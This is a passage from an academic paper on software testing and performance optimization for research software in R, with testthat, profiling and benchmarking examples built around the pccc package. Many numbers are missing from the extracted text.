tmp)] # add the matched element into the output if(length(output) != ) output <- c(i, output) output })) key recommendations for how to test: � software developer develops unit tests. � intended user of software should perform validation/acceptance tests. � run all tests regularly. 
key recommendations for how to test:
• software developer develops unit tests.
• intended user of software should perform validation/acceptance tests.
• run all tests regularly.
• review key algorithms with domain experts.

discussion: most programming languages have a multitude of testing tools and frameworks available for assisting developers with the process of testing software. due to the recurring patterns common across programming languages, most languages have a sunit (wikipedia contributors, a) derived testing tool, commonly referred to as an "xunit" (wikipedia contributors, b) testing framework, that focuses on validating that individual units of code, along with the necessary input and output, meet desired requirements. depending on the language used, unit tests may be at the class or function/procedure level. some common xunit-style packages in r are runit and testthat. unit tests should be automated and run regularly to ensure errors are caught and addressed quickly. for r, it is easy to integrate unit tests into the package build process, but other approaches such as a post-commit hook in a version control system are also common. in addition to unit tests, typically written by the developers of the software, users should perform acceptance tests, or high-level functionality tests that validate the software meets requirements. due to the high-level nature and subjective focus of acceptance tests, they are often manually performed and may not follow a regimented series of steps. careful documentation of how a user will actually use the software, referred to as user stories, is translated into step-by-step tests that a human follows to validate that the software works as expected. a few examples of acceptance testing tools that primarily focus on gui aspects of software are: selenium (selenium contributors, ), microfocus unified functional testing (formerly known as hp's quicktest professional) (micro focus, ), and ranorex (ranorex gmbh, ). as research-focused software often does not have a gui, one aid to manual testing processes is for developers of the software or expert users to create a full step-by-step example via an r markdown (allaire et al., b; xie, allaire & grolemund, ) notebook demonstrating use of the software, followed by either manual or automatic validation that the expected end result is correct. in addition to the tool-based approaches already mentioned, other harder-to-test items such as algorithms and solution approach should be scrutinized as well. while automated tests can validate that mathematical operations or other logic steps are correct, they cannot verify that the approach or assumptions implied through software operations are correct. this level of testing can be done through code review and design review sessions with others who have knowledge of the domain or a related domain. during development of the pccc package, after the initial tests shown in previous sections, further thought went into how the specifics of the desired functionality should perform. unit tests were developed to validate core functionality. we also spent time thinking about how the software might behave if the input data was incorrect or if parameters were not specified correctly. if an issue is discovered at this point, a common pattern is to create a test case for each discovered bug that is fixed; this ensures that a recurrence of the error, known to software engineers as a "regression", does not happen again.
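regression tests only provide this protection if they are run with every build. as a concrete illustration of integrating unit tests into the package build process, the conventional testthat layout places a small driver script at tests/testthat.R so that R CMD check runs the whole suite automatically; a minimal sketch, using pccc as the example package name:

# tests/testthat.R (run automatically by R CMD check)
library(testthat)
library(pccc)

test_check("pccc")

individual test files then live under tests/testthat/ and can also be run interactively during development, for example with devtools::test().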
in the case of pccc, developers expected large input comprised of many observations with many variables. when a tester accidentally passed a single observation with many variables, the program crashed. the problem was discovered to be due to the flexible nature of the sapply() function, which returns different data types depending on its input.

the original code from ccc.r:

# diagnosis columns were specified in the call
if (!missing(dx_cols)) {
  # assume columns are referenced by 'dx_cols'
  dxmat <- sapply(dplyr::select(data, !!dplyr::enquo(dx_cols)), as.character)
  # create empty matrix if necessary
  if (!is.matrix(dxmat)) {
    dxmat <- as.matrix(dxmat)
  }
} else {
  dxmat <- matrix("", nrow = nrow(data))
}

the new code:

if (!missing(dx_cols)) {
  dxmat <- as.matrix(dplyr::mutate_all(
    dplyr::select(data, !!dplyr::enquo(dx_cols)),
    as.character))
} else {
  dxmat <- matrix("", nrow = nrow(data))
}

one of the tests written to verify the problem didn't reoccur:

# due to previous use of sapply in ccc.r, this would fail
test_that(paste("patient with multiple rows of no diagnosis",
                "data--should have all cccs as false"), {
  expect_true(all(ccc(dplyr::data_frame(id = "a",
                                        dx1 = NA,   # diagnosis columns with no data
                                        dx2 = NA),
                      dx_cols = dplyr::starts_with("dx"),
                      icdv = 9) == 0))   # assuming icd-9 codes
})

testing anti-patterns: while the above guidance should help researchers learn the basics of testing, it does not cover in detail what not to do. an excellent collection of testing anti-patterns can be found at (moilanen, ; carr, ; stack overflow contributors, ). some key problems that novices experience when learning how to test software are:
• interdependent tests: interdependent tests can cause multiple test failures. when a failure in an early test case breaks a later test, it can cause difficulty in resolution and remediation.
• testing application performance: while testing execution timing or software performance is a good idea and is covered more in the "software optimization" section, creating an automated test to perform this is difficult and does not carry over well from one machine to another.
• slow running tests: as much as possible, tests should be automated but still run quickly. if the testing process takes too long, consider refactoring the tests or evaluating the performance of the software being tested.
• only testing correct input: a common problem in testing is to only validate expected inputs and desired behavior. make sure tests cover invalid input, exceptions, and similar items.

software optimization

getting software to run in a reasonable amount of time is always a key consideration when working with large datasets. a mathematical understanding of software algorithms is usually a key component of software engineering curricula, but it is not widely covered in other disciplines. additionally, while software engineering texts and curricula highlight the importance of testing for non-functional requirements such as performance (sommerville, ), they often fail to provide details on how best to evaluate software performance or how to plan for performance during the various phases of the software lifecycle. the survey of r packages at the beginning of this work indicates that a substantial proportion of packages use neither optimization-related packages nor compiled code to improve performance.
while the survey of r packages is not evidence of non-optimization of the packages on cran, computational researchers should carefully consider performance aspects of their software before declaring it complete. this section will provide a starting point for additional study, research, and experimentation. the python foundation's python language wiki provides excellent high-level advice (python wiki contributors, ) to follow before spending too much time on optimization: first get the software working correctly, test to see if it is correct, profile the application if it is slow, and lastly optimize based on the results of code profiling. if necessary, repeat multiple cycles of the testing, profiling, and optimization phases. the key aspects of software optimization discussed in this section are: identifying a performance target, understanding and applying big o notation, and the use of code profiling and benchmarking tools.

key recommendations for identifying and validating performance targets:
• identify functional and non-functional requirements of the software being developed.
• if software performance is key to the software requirements, develop repeatable tests to evaluate performance.

discussion: the first step of software optimization is to understand the functional and non-functional requirements of the software being built. based on the expected input, output, and platform the software will be run on, one can make a decision as to what is good enough for the software being developed. a pragmatic approach is best: do not spend time optimizing if it does not add value. once the functional requirements have been correctly implemented and validated, a decision point is reached: decide if the software is slow and in need of evaluation and optimization. while this may seem a trivial and unnecessary step, it should not be overlooked; the costs and benefits of an optimization effort should be carefully evaluated before moving forward. some methods for gathering the performance target are an evaluation of other similar software, the interdependencies of the software and its interaction with other systems, and discussion with other experts in the field. once a performance target has been identified, development of tests for performance can begin. while performance testing is often considered an anti-pattern of testing (moilanen, ), some repeatable tests should be created to track performance as development progresses. often a "stress test", or a test with greater than expected input/usage, is the best way to do this. a good target is to check an order of magnitude larger input than expected. this type of testing can provide valuable insight into the performance characteristics of the software as well as unearth potential failures due to unexpected load (sommerville, ). here is an example of performance validation testing that can also serve as a basic reproducibility test, calling the main function from pccc using the microbenchmark package (one could also use bench, benchr, or other similar r packages).
library(pccc)
rm(list = ls())
gc()

icd_large <- feather::read_feather(
  "../icd_file_generator/icd_sample_large.feather")

library(microbenchmark)
microbenchmark(
  ccc(icd_large,                          # data with id, dx, and pc columns
      id = id,
      dx_cols = dplyr::starts_with("dx"),
      pc_cols = dplyr::starts_with("pc"),
      icdv = 9),                          # assuming icd-9 codes
  times = 10)                             # e.g., 10 iterations instead of the default 100

unit: seconds
 expr min lq mean median uq max neval
  ccc   .  .    .      .  .   .     .

results are from a system with an intel core i processor, lpddr memory, and a pci-express ssd, running macos and r.

as software runs can differ significantly from one run to the next due to other software running on the test system, a good starting point is to run the same test several times (rather than the microbenchmark default of 100, as this is a longer-running process) and record the mean run time. microbenchmark also shows the median, lower and upper quartiles, min, and max run times. the actual ccc() call specifics are unimportant; the key is to test the main features of your software in a repeatable fashion and watch for performance changes over time. these metrics can help to identify whether a test was valid and indicate a need for retesting; that is, a large interquartile range may indicate that not enough tests were run or that some aspect of the environment is causing performance variations. software benchmarking is highly system specific, in that changing the os version, r version, r dependent package versions, compiler version (if compiled code is involved), or hardware may change the results. as long as all tests are run the same way on the same system with the same software, one can compare timings as development progresses. lastly, although the example above is focused on runtime, it can be beneficial to also identify targets for the disk space used and the memory required to complete all desired tasks. as an example, tools such as bench and profvis, demonstrated in our "code profiling/benchmarking" section, as well as object.size() from core r, can give developers insight into memory allocation and usage. there are many resources beyond this work that can provide guidance on how to minimize ram and disk resources (kane, emerson & weston, ; wickham, b; wickham et al., ; klik, collet & facebook, ).

key recommendations for identifying an upper bound on performance:
• big o notation allows the comparison of the theoretical performance of different algorithms.
• evaluate how many times blocks of code will run as input approaches infinity.
• loops inside loops are very slow as input approaches infinity.

discussion: big o notation is a method for mathematically determining the upper bound on performance of a block of code without consideration for language and hardware specifics. although performance can be evaluated in terms of storage or run time, most examples and comparisons focus on run time. however, when working with large datasets, memory usage and disk usage can be of equal or higher importance than run time. big o notation is reported in terms of the input size (usually denoted as n) and allows one to quickly compare the theoretical performance of different algorithms. the basic step for evaluating the upper bound on performance of a block of software code is to evaluate what code will run as n approaches infinity. items that are constant time (regardless of whether they run once or x times independent of input) are reduced down to o(1).
the key factors that contribute to big o are loops: a single for loop, or a similar construct through recursion, that runs once for all n is o(n); a nested for loop would be o(n²). when calculating big o for a code block, function, or software system, lower-order terms are ignored and just the largest big o term is used; for example, if a code block is o(1) + o(n) + o(n²), it would be denoted as o(n²). despite the value of understanding the theoretical upper bound of software in an ideal situation, there are many difficulties that arise during implementation that can make big o difficult to calculate and that could make a large big o faster than a small big o under actual input conditions. some key takeaways to temper a mathematical evaluation of big o are:
• constants matter when choosing an algorithm: for example, if one algorithm is o(n) but with a very large constant factor, there exists some n below which an o(n²) algorithm is faster.
• average or best case run time might be more relevant.
• big o evaluation of algorithms in high level languages is often hard to quantify.
for additional details on big o notation, see the excellent and broadly understandable introduction to big o notation (abrahms, ).
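as a small illustration of how these bounds show up in r code, the sketch below (hypothetical data, not from pccc) compares a nested-loop o(n²) count of duplicated pairs with an o(n) tabulation; both give the same answer, but their run times grow very differently as n increases:

set.seed(42)
x <- sample(letters, 500, replace = TRUE)

# o(n^2): compare every element with every other element
count_dup_pairs_slow <- function(x) {
  n <- length(x)
  count <- 0
  for (i in seq_len(n)) {
    for (j in seq_len(n)) {
      if (i < j && x[i] == x[j]) count <- count + 1
    }
  }
  count
}

# o(n): tabulate the values once, then combine the per-value counts
count_dup_pairs_fast <- function(x) {
  counts <- table(x)
  sum(choose(counts, 2))
}

stopifnot(count_dup_pairs_slow(x) == count_dup_pairs_fast(x))

timing the two functions with microbenchmark or bench for a few growing values of n makes the quadratic growth of the first version obvious, even though both are correct.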
key recommendations for profiling and benchmarking:
• profile code to find bottlenecks.
• modify code to address the largest items identified by profiling.
• run tests to make sure functionality isn't affected.
• repeat the process if gains are made and additional performance improvements are necessary.

discussion: as discussed throughout this section, optimization is a key aspect of software development, especially with respect to large datasets. although identification of performance targets and a mathematical analysis of algorithms are important steps, the final result must be tested and verified. the only way to know if your software will perform adequately under ideal (and non-ideal) circumstances is to use benchmarking and code profiling tools. code profilers show how software behaves and what functions are being called, while benchmarking tools generally focus on just execution time, though some tools combine both profiling and benchmarking. in r, some of the common tools are bench, benchr, microbenchmark, tictoc, rprof (r core team, ), proftools (tierney & jarjour, ), and profvis. if, after implementation has been completed, the software functions correctly but performance targets have not been met, look to optimize your code. follow an iterative process of profiling to find bottlenecks, making software adjustments, testing small sections with benchmarking, and then repeating the process with overall profiling again. if at any point in the process you discover that, due to input size, functional requirements, hardware limitations, or software dependencies, you cannot make a significant impact on performance, consider stopping further optimization efforts (burns, ). as with software testing and software bugs, the pareto principle applies, though for execution time some put the balance even more sharply, with the large majority of run time spent in a small fraction of the code (xochellis, ; bird, ). identify the biggest bottlenecks via code profiling and focus only on the top issues first. as an example of how to perform code profiling and benchmarking in r, do the following.

first, use profvis to identify the location with the largest execution time:

library(pccc)
icd_large <- feather::read_feather("icd_sample_large.feather")
profvis::profvis({
  ccc(icd_large,
      id = id,
      dx_cols = dplyr::starts_with("dx"),
      pc_cols = dplyr::starts_with("pc"),
      icdv = 9)   # assuming icd-9 codes
})

figure: profvis flame graph. visual depiction of memory allocation/deallocation, execution time, and call stack.

in the figure you can see a visual depiction of memory allocation, known as a "flame graph," as well as execution time and the call stack. by clicking on each item in the stack you will be taken directly to the relevant source code and can see which portions of the code take the most time or memory allocations. the data view, also shown in a figure, shows just the memory changes, execution time, and source file. once the bottleneck has been identified, if possible extract that code to a single function or line that can be run repeatedly with a library such as microbenchmark or tictoc to see whether a small change improves or degrades performance. test frequently and make sure to compare against previous versions. you may find that something you thought would improve performance actually degrades it. as a first step we recommend running tictoc to get general timings such as the following:

library(tictoc)

tic("timing: r version")
out <- dplyr::bind_cols(ids, ccc_mat_r(dxmat, pcmat, icdv))
toc()

tic("timing: c++ version")
dplyr::bind_cols(ids, ccc_mat_rcpp(dxmat, pcmat, icdv))
toc()

timing: r version: . sec elapsed
timing: c++ version: . sec elapsed

as with the previous timings, while we're showing pccc calls, any custom function or block of code can be compared against an alternative version to see which performs better. the above blocks of code call the core functionality of the pccc package, one implemented entirely in r and the other with c++ for the matrix processing and string matching components; see the source code available at https://github.com/magic-lantern/pccc/blob/no_cpp/r/ccc.r for a full listing. after starting with high-level timings, next run benchmarks on specific sections of code, such as in this example comparing importing a package vs using the package reference operator, using bench:

library(bench)
set.seed(1)   # arbitrary seed

bench::mark(
  package_ref <- lapply(medium_input, function(i) {
    if (any(stringi::stri_startswith_fixed(i, "s"), na.rm = TRUE))
      return(1L)
    else
      return(0L)
  }))

# a tibble:
  expression    min  mean  median  max  `itr/sec`  mem_alloc
  <chr>       <bch> <bch>  <bch:> <bch>     <dbl>  <bch:byt>
  package_ref    ms    ms      ms    ms                   mb

library(stringi)
bench::mark(
  direct_ref <- lapply(medium_input, function(i) {
    if (any(stri_startswith_fixed(i, "s"), na.rm = TRUE))
      return(1L)
    else
      return(0L)
  }))

# a tibble:
  expression    min  mean  median  max  `itr/sec`  mem_alloc
  <chr>       <bch> <bch>  <bch:> <bch>     <dbl>  <bch:byt>
  direct_ref     ms    ms      ms    ms                   mb

the above test was run on a virtual machine running ubuntu lts and r.
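a benchmark like the one above answers "which of two versions is faster at one input size". to see how run time scales with input size, the same comparison can be repeated over a grid of sizes with bench::press; a minimal sketch (the two counting functions and the sizes are illustrative, not part of pccc):

library(bench)

# two ways to count how many strings start with "s"
count_loop <- function(x) {
  n <- 0L
  for (s in x) if (startsWith(s, "s")) n <- n + 1L
  n
}
count_vec <- function(x) sum(startsWith(x, "s"))

results <- bench::press(
  n = c(1e3, 1e4, 1e5),
  {
    x <- sample(c("start", "stop", "other"), n, replace = TRUE)
    bench::mark(count_loop(x), count_vec(x))
  }
)
results

bench also provides an autoplot method for these results, which makes it easy to see whether run time grows linearly or worse as n increases and ties the empirical measurements back to the big o discussion above.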
one benefit of bench::mark over microbenchmark is that bench reports memory allocations as well as timings, similar to the data shown in profvis.

figure: profvis data chart. table view of memory allocation/deallocation, execution time, and call stack.

figure: profvis flame graph at .call(). visual depiction of memory allocation/deallocation, execution time, and call stack; note the limited detail at the .call() function where custom compiled code is called.

through benchmarking we found that for some systems/configurations the use of the "::" operator, as opposed to importing a package, worsened performance noticeably. also widely known (gillespie & lovelace, ), and found to be applicable here, is that matrices are preferred for performance reasons over data.frames or tibbles. matrices do have different functionality, which can require some re-work when converting from one to the other. for example, a matrix can only contain a single data type, such as character or numeric, while data.frames and tibbles support shortcut notations such as mydf$colname. another key point we found is that an "env" with no parent environment is significantly faster than one with a parent env. in the end, our optimization efforts resulted in a substantial reduction in run time. one limitation of r profiling tools is that if the code to be profiled executes c++ code, you will get no visibility into what is happening once the switch from r to c++ has occurred. as shown in the figure, visibility into timing and memory allocation stops at the .call() function. in order to profile c++ code, you need to use non-r-specific tools such as xcode on macos or gprof on non-macos unix-based operating systems. see "r_with_c++_profiling.md" in our source code repository for some guidance on this topic. some general lessons learned from profiling and benchmarking:
• "beware the dangers of premature optimization of your code. your first duty is to create clear, correct code." (knuth, ; burns, ) never optimize before you actually know what is taking all the time/memory/space in your software. different compilers and core language updates will often change or reverse what experience has previously indicated as sources of slowness. always benchmark and profile before making a change.
• start development with a high-level programming language first; developer/researcher time is more valuable than cpu/gpu time. choose the language that allows the developer/researcher to rapidly implement the desired functionality rather than selecting a language/framework based on artificial benchmarks (kelleher & pausch, ; jones & bonsignour, ).
• software timing is highly os, compiler, and system configuration specific. what improves results greatly on one machine and configuration may actually slow performance on another machine. once you have decided to put effort into optimization, make sure you test on a range of realistic configurations before deciding that an "improvement" is beneficial (hyde, ).
• if you've exhausted your options with your chosen high-level language, c++ is usually the best option for further optimization. for an excellent introduction to combining c++ with r via the rcpp library, see (eddelbuettel & balamuta, ).
for some additional information on r optimization, see (wickham, b; robinson, ).

conclusion

researchers frequently develop software to automate tasks and speed the pace of research. unfortunately, researchers are rarely trained in the software engineering principles necessary to develop robust, validated, and performant software. software maintenance is an often overlooked and underestimated aspect of the lifecycle of any software product. software engineering principles and tooling place special focus on the processes around designing, building, and maintaining software. in this paper, the key topics of software testing and software optimization have been discussed along with some analysis of existing software packages in the r language. our analysis showed that the majority of r packages show neither unit testing nor evidence of optimization in their publicly distributed source code. through self-education on unit testing and optimization, any computational or other researcher can pick up the key principles of software engineering that will enable them to spend less time troubleshooting software and more time doing the research they enjoy.

additional information and declarations

funding: the university of colorado data science to patient value initiative provided funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosure: the following grant information was disclosed by the authors: university of colorado data science to patient value.

competing interests: the authors declare that they have no competing interests.

author contributions:
• seth russell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• tellen d. bennett conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• debashis ghosh conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

data availability: the following information was supplied regarding data availability: source code, images, and generated data for the r package analysis are available at https://github.com/magic-lantern/softwareengineeringprinciples. materials from the paper, including figures, references, and text, are available at https://github.com/magic-lantern/softwareengineeringprinciples/tree/master/paper.

supplemental information: supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references

abrahms j. . big-o notation explained by a self-taught programmer. available at https://justin.abrah.ms/computer-science/big-o-notation-explained.html.
agruss c, johnson b. . ad hoc software testing. viitattu : .
allaire jj, francois r, ushey k, vandenbrouck g, library mg (tinythread, http://tinythreadpp. bitsnbites.eu/), rstudio, library i (intel t, https://www.threadingbuildingblocks.org/), microsoft. a. rcppparallel: parallel programming tools for “rcpp”. available at https://cran. r-project.org/package=rcppparallel. allaire jj, xie y, mcpherson j, luraschi j, ushey k, atkins a, wickham h, cheng j, chang w, iannone r. b. rmarkdown: dynamic documents for r. available at https://rmarkdown. rstudio.com. apache software foundation. . sparkr (r on spark) - spark . . documentation. available at https://spark.apache.org/docs/latest/sparkr.html. atchison wf, conte sd, hamblen jw, hull te, keenan ta, kehl wb, mccluskey ej, navarro so, rheinboldt wc, schweppe ej, viavant w, young dm jr. . curriculum : recommendations for academic programs in computer science: a report of the acm curriculum committee on computer science. communications of the acm ( ): – doi . / . . beck k, beedle m, van bennekum a, cockburn a, cunningham w, fowler m, grenning j, highsmith j, hunt a, jeffries r, kern j, marick b, martin rc, mellor s, schwaber k, sutherland j, thomas d. . manifesto for agile software development. available at http://agilemanifesto.org/. beck k, gamma e. . test infected: programmers love writing tests. java report : – . available at http://members.pingnet.ch/gamma/junit.htm. bengtsson h. . future: unified parallel and distributed processing in r for everyone. available at https://cran.r-project.org/package=future. bengtsson h, r core team. . future.apply: apply function to elements in parallel using futures. available at https://cran.r-project.org/package=future.apply. bird j. . applying the : rule in software development - dzone agile. available at https://dzone.com/articles/applying- -rule-software. bischl b, lang m. . parallelmap: unified interface to parallelization back-ends. available at https://cran.r-project.org/package=parallelmap. bischl b, lang m, mersmann o, rahnenführer j, weihs c. . batchjobs and batchexperiments: abstraction mechanisms for using r in batch environments. journal of statistical software : – . burger m, juenemann k, koenig t. . runit: r unit test framework. available at https:// cran.r-project.org/package=runit. burns p. . the r inferno. available at https://lulu.com. calaway r, analytics r, weston s. . domc: foreach parallel adaptor for “parallel.” available at https://cran.r-project.org/package=domc. calaway r, corporation m, weston s. . dosnow: foreach parallel adaptor for the “snow” package. available at https://cran.r-project.org/package=dosnow. calaway r, corporation m, weston s, tenenbaum d. . doparallel: foreach parallel adaptor for the “parallel” package. available at https://cran.r-project.org/package=doparallel. calaway r, microsoft, weston s. . foreach: provides foreach looping construct for r. available at https://cran.r-project.org/package=foreach. carr j. . tdd anti-patterns. available at https://web.archive.org/web/ /http:// blog.james-carr.org: / / / /tdd-anti-patterns/. russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/package=rcppparallel https://cran.r-project.org/package=rcppparallel https://rmarkdown.rstudio.com https://rmarkdown.rstudio.com https://spark.apache.org/docs/latest/sparkr.html http://dx.doi.org/ . / . 
http://agilemanifesto.org/ http://members.pingnet.ch/gamma/junit.htm https://cran.r-project.org/package=future https://cran.r-project.org/package=future.apply https://dzone.com/articles/applying- -rule-software https://cran.r-project.org/package=parallelmap https://cran.r-project.org/package=runit https://cran.r-project.org/package=runit https://lulu.com https://cran.r-project.org/package=domc https://cran.r-project.org/package=dosnow https://cran.r-project.org/package=doparallel https://cran.r-project.org/package=foreach https://web.archive.org/web/ /http://blog.james-carr.org: / / / /tdd-anti-patterns/ https://web.archive.org/web/ /http://blog.james-carr.org: / / / /tdd-anti-patterns/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chang w, luraschi j. . profvis: interactive visualizations for profiling r code. available at https://cran.r-project.org/package=profvis. dehaghani smh, hajrahimi n. . which factors affect software projects maintenance cost more? acta informatica medica ( ): – doi . /aim. . . - . dewitt p, bennett t, feinstein j, russell s. . pccc: pediatric complex chronic conditions. available at https://cran.r-project.org/package=pccc. dragulescu aa, arendt c. . xlsx: read, write, format excel and excel / /xp/ files. available at https://cran.r-project.org/package=xlsx. eckert a. . paralleldist: parallel distance matrix computation using multiple threads. available at https://cran.r-project.org/package=paralleldist. eddelbuettel d, balamuta jj. . extending r with c++: a brief introduction to rcpp. peerj :e v doi . /peerj.preprints. v . feinerer i, theussl s, buchta c. . dsl: distributed storage and list. available at https://cran. r-project.org/package=dsl. feinstein ja, russell s, dewitt pe, feudtner c, dai d, bennett td. . r package for pediatric complex chronic condition classification. jama pediatrics ( ): doi . /jamapediatrics. . . feudtner c, christakis da, connell fa. . pediatric deaths attributable to complex chronic conditions: a population-based study of washington state, – . pediatrics : – . feudtner c, feinstein ja, zhong w, hall m, dai d. . pediatric complex chronic conditions classification system version : updated for icd- and complex medical technology dependence and transplantation. bmc pediatrics ( ): doi . / - - - . fucci d, scanniello g, romano s, shepperd m, sigweni b, uyaguari f, turhan b, juristo n, oivo m. . an external replication on the effects of test-driven development using a multi-site blind analysis approach. in: proceedings of the th acm/ieee international symposium on empirical software engineering and measurement. esem ‘ , vol. . new york: acm, – , . gaslam b. . unitizer: interactive r unit tests. available at https://cran.r-project.org/ package=unitizer. gillespie c, lovelace r. . efficient r programming: a practical guide to smarter programming. sebastopol: o’reilly media. glass rl. . frequently forgotten fundamental facts about software engineering. ieee software ( ): – doi . /ms. . . grosjean p. . sciviews-r: a gui api for r. mons: umons. hansson dh. . tdd is dead. long live testing. (dhh). available at http://david.heinemeierhansson.com/ /tdd-is-dead-long-live-testing.html. hester j. . bench: high precision timing of r expressions. available at https://cran.r-project.org/ package=bench. hyde r. . the fallacy of premature optimization. ubiquity : doi . / . . izrailev s. . tictoc: functions for timing r scripts, as well as implementations of stack and list structures. 
available at https://cran.r-project.org/package=tictoc. jones c, bonsignour o. . the economics of software quality. upper saddle river: addison- wesley professional. kane m, emerson j, weston s. . scalable strategies for computing with massive data. journal of statistical software ( ): – doi . /jss.v .i . russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cran.r-project.org/package=profvis http://dx.doi.org/ . /aim. . . - https://cran.r-project.org/package=pccc https://cran.r-project.org/package=xlsx https://cran.r-project.org/package=paralleldist http://dx.doi.org/ . /peerj.preprints. v https://cran.r-project.org/package=dsl https://cran.r-project.org/package=dsl http://dx.doi.org/ . /jamapediatrics. . http://dx.doi.org/ . / - - - https://cran.r-project.org/package=unitizer https://cran.r-project.org/package=unitizer http://dx.doi.org/ . /ms. . http://david.heinemeierhansson.com/ /tdd-is-dead-long-live-testing.html https://cran.r-project.org/package=bench https://cran.r-project.org/package=bench http://dx.doi.org/ . / . https://cran.r-project.org/package=tictoc http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kanewala u, bieman jm. . testing scientific software: a systematic literature review. information and software technology ( ): – doi . /j.infsof. . . . kelleher c, pausch r. . lowering the barriers to programming: a taxonomy of programming environments and languages for novice programmers. acm computing surveys ( ): – doi . / . . klevtsov a, antonov a, upravitelev p. . benchr: high precise measurement of r expressions execution time. available at https://cran.r-project.org/package=benchr. klik m, collet y, facebook. . fst: lightning fast serialization of data frames for r. available at https://cran.r-project.org/package=fst. knuth de. . structured programming with go to statements. acm computing surveys ( ): – doi . / . . koskinen j. . software maintenance costs. available at https://wiki.uef.fi/download/ attachments/ /smcosts.pdf. kusnierczyk w, eddelbuettel d, hasselman b. . rbenchmark: benchmarking routine for r. available at https://cran.r-project.org/package=rbenchmark. leek jt, peng rd. . opinion: reproducible research can still be wrong: adopting a prevention approach. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lentin j, hennessey a. . unittest: tap-compliant unit testing. available at https://cran.r- project.org/package=unittest. luraschi j, kuo k, ushey k, allaire jj, macedo s, rstudio, foundation tas. . sparklyr: r interface to apache spark. available at https://cran.r-project.org/package=sparklyr. matloff n. . software alchemy: turning complex statistical computations into embarrassingly-parallel ones. journal of statistical software ( ): – doi . /jss.v .i . mersmann o. . microbenchmark: accurate timing functions. available at https://cran.r- project.org/package=microbenchmark. micro focus. . unified functional testing. available at https://software.microfocus.com/en-us/ products/unified-functional-automated-testing/overview (accessed april ). moilanen j. . test driven development details. available at https://github.com/educloudalliance/ educloud-development/wiki/test-driven-development-details (accessed april ). nolan r, padilla-parra s. . exampletestr—an easy start to unit testing r packages. wellcome open research : doi . /wellcomeopenres. . . nutter b, lane s. . redcapapi: accessing data from redcap projects using the api. zenodo. doi . /zenodo. 
. osborne jm, bernabeu mo, bruna m, calderhead b, cooper j, dalchau n, dunn s-j, fletcher ag, freeman r, groen d, knapp b, mcinerny gj, mirams gr, pitt-francis j, sengupta b, wright dw, yates ca, gavaghan dj, emmott s, deane c. . ten simple rules for effective computational research. plos computational biology ( ):e doi . /journal.pcbi. . prins p, de ligt j, tarasov a, jansen rc, cuppen e, bourne pe. . toward effective software solutions for big biology. nature biotechnology ( ): – doi . /nbt. . python wiki contributors. . performance tips. available at https://wiki.python.org/moin/ pythonspeed/performancetips (accessed april ). russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / . https://cran.r-project.org/package=benchr https://cran.r-project.org/package=fst http://dx.doi.org/ . / . https://wiki.uef.fi/download/attachments/ /smcosts.pdf https://wiki.uef.fi/download/attachments/ /smcosts.pdf https://cran.r-project.org/package=rbenchmark http://dx.doi.org/ . /pnas. https://cran.r-project.org/package=unittest https://cran.r-project.org/package=unittest https://cran.r-project.org/package=sparklyr http://dx.doi.org/ . /jss.v .i https://cran.r-project.org/package=microbenchmark https://cran.r-project.org/package=microbenchmark https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://software.microfocus.com/en-us/products/unified-functional-automated-testing/overview https://github.com/educloudalliance/educloud-development/wiki/test-driven-development-details https://github.com/educloudalliance/educloud-development/wiki/test-driven-development-details http://dx.doi.org/ . /wellcomeopenres. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nbt. https://wiki.python.org/moin/pythonspeed/performancetips https://wiki.python.org/moin/pythonspeed/performancetips http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at http://www.r-project.org/. ranorex gmbh. . ranorex. available at https://www.ranorex.com (accessed april ). reese j. . best practices for writing unit tests. available at https://docs.microsoft.com/en-us/ dotnet/core/testing/unit-testing-best-practices. robinson e. . making r code faster : a case study. available at https://robinsones.github.io/ making-r-code-faster-a-case-study/. rooney p. . microsoft’s ceo: - rule applies to bugs, not just features. available at http://www.crn.com/news/security/ /microsofts-ceo- - -rule-applies-to-bugs-not-just- features.htm. sandve gk, nekrutenko a, taylor j, hovig e. . ten simple rules for reproducible computational research. plos computational biology ( ):e doi . /journal.pcbi. . selenium contributors. . selenium. available at https://www.seleniumhq.org (accessed april ). sommerville i. . software engineering. boston: pearson. sommerville i. . giving up on test-first development. available at http://iansommerville.com/ systems-software-and-technology/giving-up-on-test-first-development/. stack overflow contributors. . unit testing anti-patterns catalogue. available at https://stackoverflow.com/questions/ /unit-testing-anti-patterns-catalogue (accessed april ). the joint task force on computing curricula. . curriculum guidelines for undergraduate degree programs in software engineering. new york: acm. tierney l, jarjour r. . 
